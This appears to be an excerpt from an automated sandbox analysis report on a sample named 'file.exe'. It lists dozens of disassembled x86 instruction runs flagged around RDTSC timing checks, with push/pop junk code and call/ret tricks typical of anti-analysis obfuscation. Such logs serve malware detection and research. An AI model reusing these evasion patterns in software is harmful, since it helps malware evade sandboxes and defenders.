    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7379AB second address: 7379B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7379B7 second address: 7379BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7379BD second address: 7379C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739C77 second address: 739C97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007EFF192B60F8h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73A0BF second address: 73A0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73A1FF second address: 73A215 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFF192B60E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007EFF192B60E6h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73A215 second address: 73A219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73A3B4 second address: 73A3BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73A899 second address: 73A8B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73A8B2 second address: 73A8C4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFF192B60E8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73A8C4 second address: 73A8F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007EFF192480C3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73A8F4 second address: 73A906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 push eax 0x00000008 jng 00007EFF192B60F4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73A906 second address: 73A90A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B3F1 second address: 73B3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B3F8 second address: 73B3FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B3FE second address: 73B402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B402 second address: 73B406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B406 second address: 73B461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007EFF192B60EEh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007EFF192B60E8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1F10h], edx 0x0000002f push 00000000h 0x00000031 xor esi, dword ptr [ebp+122D5E12h] 0x00000037 push 00000000h 0x00000039 mov edi, dword ptr [ebp+122D2DFDh] 0x0000003f xchg eax, ebx 0x00000040 pushad 0x00000041 js 00007EFF192B60ECh 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B461 second address: 73B478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007EFF192480B8h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007EFF192480BCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73BC48 second address: 73BC60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CE2E second address: 73CE34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D98B second address: 73D991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D991 second address: 73D9CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D2959h], edi 0x00000011 push 00000000h 0x00000013 mov esi, 28186B0Fh 0x00000018 push 00000000h 0x0000001a add dword ptr [ebp+122D2B2Dh], esi 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 jns 00007EFF192480B8h 0x00000028 push eax 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b pop eax 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jnc 00007EFF192480B6h 0x00000038 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D9CB second address: 73D9D1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E355 second address: 73E359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E359 second address: 73E3E6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFF192B60E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007EFF192B60E8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D1FFCh], ebx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007EFF192B60E8h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a or esi, dword ptr [ebp+122D2E4Dh] 0x00000050 mov si, di 0x00000053 jc 00007EFF192B60EEh 0x00000059 push edx 0x0000005a ja 00007EFF192B60E6h 0x00000060 pop edi 0x00000061 push 00000000h 0x00000063 mov esi, dword ptr [ebp+122D2B13h] 0x00000069 xchg eax, ebx 0x0000006a jmp 00007EFF192B60EFh 0x0000006f push eax 0x00000070 pushad 0x00000071 jns 00007EFF192B60ECh 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E3E6 second address: 73E3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E3EE second address: 73E3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EE8A second address: 73EEE8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFF192480B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007EFF192480B8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 pushad 0x00000029 je 00007EFF192480B9h 0x0000002f movsx ecx, dx 0x00000032 pushad 0x00000033 mov edi, dword ptr [ebp+122D2650h] 0x00000039 and di, 5F49h 0x0000003e popad 0x0000003f popad 0x00000040 push 00000000h 0x00000042 mov dword ptr [ebp+124711A1h], ebx 0x00000048 push 00000000h 0x0000004a mov esi, 1342C22Ah 0x0000004f xchg eax, ebx 0x00000050 pushad 0x00000051 pushad 0x00000052 pushad 0x00000053 popad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EEE8 second address: 73EEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EEF0 second address: 73EF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a js 00007EFF192480B6h 0x00000010 pop ecx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7404D1 second address: 7404D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742E1B second address: 742E38 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFF192480BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jns 00007EFF192480B6h 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742E38 second address: 742E42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007EFF192B60E6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742E42 second address: 742E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 743E24 second address: 743E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7420DD second address: 7420F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7420F0 second address: 7420F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744DEE second address: 744DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7420F6 second address: 74219C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007EFF192B60F5h 0x00000013 cmc 0x00000014 pop ebx 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007EFF192B60E8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000015h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 movzx edi, cx 0x00000039 mov dword ptr [ebp+1244A564h], ecx 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 movsx edi, cx 0x00000049 mov eax, dword ptr [ebp+122D0B7Dh] 0x0000004f push 00000000h 0x00000051 push eax 0x00000052 call 00007EFF192B60E8h 0x00000057 pop eax 0x00000058 mov dword ptr [esp+04h], eax 0x0000005c add dword ptr [esp+04h], 0000001Ah 0x00000064 inc eax 0x00000065 push eax 0x00000066 ret 0x00000067 pop eax 0x00000068 ret 0x00000069 js 00007EFF192B60ECh 0x0000006f sbb edi, 4AECE245h 0x00000075 push FFFFFFFFh 0x00000077 mov dword ptr [ebp+122D2469h], eax 0x0000007d push eax 0x0000007e push ecx 0x0000007f push eax 0x00000080 push edx 0x00000081 pushad 0x00000082 popad 0x00000083 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744DF2 second address: 744E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007EFF192480B6h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 743FB5 second address: 74404E instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFF192B60E8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D1CA2h], edx 0x00000015 mov ebx, dword ptr [ebp+122D33AFh] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 mov di, cx 0x00000025 mov edi, 18EA05BBh 0x0000002a mov dword ptr fs:[00000000h], esp 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007EFF192B60E8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b add dword ptr [ebp+122D266Dh], edi 0x00000051 mov eax, dword ptr [ebp+122D1015h] 0x00000057 push 00000000h 0x00000059 push eax 0x0000005a call 00007EFF192B60E8h 0x0000005f pop eax 0x00000060 mov dword ptr [esp+04h], eax 0x00000064 add dword ptr [esp+04h], 00000018h 0x0000006c inc eax 0x0000006d push eax 0x0000006e ret 0x0000006f pop eax 0x00000070 ret 0x00000071 add dword ptr [ebp+1244BC44h], eax 0x00000077 push FFFFFFFFh 0x00000079 add edi, 1144499Ah 0x0000007f adc ebx, 50CDC53Ah 0x00000085 push eax 0x00000086 pushad 0x00000087 push eax 0x00000088 push edx 0x00000089 jne 00007EFF192B60E6h 0x0000008f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74404E second address: 74405B instructions: 0x00000000 rdtsc 0x00000002 je 00007EFF192480B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744F5F second address: 744F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746E78 second address: 746E82 instructions: 0x00000000 rdtsc 0x00000002 js 00007EFF192480B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744F63 second address: 744F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746FDE second address: 746FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746FE2 second address: 746FE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749064 second address: 749133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jmp 00007EFF192480C5h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007EFF192480B8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov ebx, dword ptr [ebp+122D2DB1h] 0x0000002e jmp 00007EFF192480BEh 0x00000033 push dword ptr fs:[00000000h] 0x0000003a call 00007EFF192480BCh 0x0000003f mov di, D311h 0x00000043 pop ebx 0x00000044 add edi, dword ptr [ebp+122D2E9Dh] 0x0000004a mov dword ptr fs:[00000000h], esp 0x00000051 push 00000000h 0x00000053 push ebx 0x00000054 call 00007EFF192480B8h 0x00000059 pop ebx 0x0000005a mov dword ptr [esp+04h], ebx 0x0000005e add dword ptr [esp+04h], 00000016h 0x00000066 inc ebx 0x00000067 push ebx 0x00000068 ret 0x00000069 pop ebx 0x0000006a ret 0x0000006b or dword ptr [ebp+122D1CD0h], eax 0x00000071 mov eax, dword ptr [ebp+122D06C9h] 0x00000077 jmp 00007EFF192480BAh 0x0000007c push FFFFFFFFh 0x0000007e jnc 00007EFF192480BCh 0x00000084 push eax 0x00000085 pushad 0x00000086 push eax 0x00000087 push edx 0x00000088 jmp 00007EFF192480C2h 0x0000008d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749133 second address: 749145 instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFF192B60E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007EFF192B60ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74D6E7 second address: 74D6F1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFF192480BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74D6F1 second address: 74D748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jp 00007EFF192B60EEh 0x0000000d push ebx 0x0000000e jbe 00007EFF192B60E6h 0x00000014 pop ebx 0x00000015 nop 0x00000016 add bl, FFFFFFDFh 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007EFF192B60E8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 mov di, F726h 0x00000039 jbe 00007EFF192B60ECh 0x0000003f mov edi, dword ptr [ebp+1244A580h] 0x00000045 push 00000000h 0x00000047 xor dword ptr [ebp+122D26F7h], eax 0x0000004d xchg eax, esi 0x0000004e push edx 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74D748 second address: 74D74E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E7CD second address: 74E7D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E7D1 second address: 74E7E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007EFF192480B6h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E7E2 second address: 74E7E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F759 second address: 74F7EE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFF192480B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007EFF192480C9h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007EFF192480B8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c xor bx, BCE8h 0x00000031 jns 00007EFF192480C9h 0x00000037 push edx 0x00000038 jmp 00007EFF192480C1h 0x0000003d pop ebx 0x0000003e push 00000000h 0x00000040 mov bx, cx 0x00000043 push 00000000h 0x00000045 jne 00007EFF192480BCh 0x0000004b or dword ptr [ebp+122D3A3Ch], edi 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007EFF192480C9h 0x00000059 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74D883 second address: 74D926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 mov ebx, dword ptr [ebp+122D2680h] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007EFF192B60E8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 sbb bx, 39AFh 0x0000003c movzx ebx, cx 0x0000003f mov eax, dword ptr [ebp+122D09FDh] 0x00000045 mov bl, 5Ah 0x00000047 push FFFFFFFFh 0x00000049 push 00000000h 0x0000004b push edx 0x0000004c call 00007EFF192B60E8h 0x00000051 pop edx 0x00000052 mov dword ptr [esp+04h], edx 0x00000056 add dword ptr [esp+04h], 00000014h 0x0000005e inc edx 0x0000005f push edx 0x00000060 ret 0x00000061 pop edx 0x00000062 ret 0x00000063 pushad 0x00000064 mov esi, dword ptr [ebp+1245C7BDh] 0x0000006a mov ecx, dword ptr [ebp+122D2BF1h] 0x00000070 popad 0x00000071 nop 0x00000072 jmp 00007EFF192B60F9h 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007EFF192B60EDh 0x0000007f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750859 second address: 75085E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7508F8 second address: 750902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007EFF192B60E6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F985 second address: 74FA0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007EFF192480C3h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 jg 00007EFF192480B8h 0x00000018 jmp 00007EFF192480BEh 0x0000001d popad 0x0000001e nop 0x0000001f push ecx 0x00000020 cmc 0x00000021 pop edi 0x00000022 push dword ptr fs:[00000000h] 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 call 00007EFF192480C7h 0x00000035 mov edi, dword ptr [ebp+122D2D05h] 0x0000003b pop edi 0x0000003c mov eax, dword ptr [ebp+122D1311h] 0x00000042 clc 0x00000043 mov dword ptr [ebp+1244A571h], ecx 0x00000049 push FFFFFFFFh 0x0000004b mov ebx, dword ptr [ebp+122D3D48h] 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push ecx 0x00000056 pop ecx 0x00000057 pop eax 0x00000058 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750902 second address: 750913 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007EFF192B60E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74FA0D second address: 74FA12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751925 second address: 75192F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007EFF192B60E6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750B17 second address: 750B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750B1B second address: 750B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752BFC second address: 752C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007EFF192480B6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752C06 second address: 752C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757C33 second address: 757C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75AAD7 second address: 75AADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75AADB second address: 75AADF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
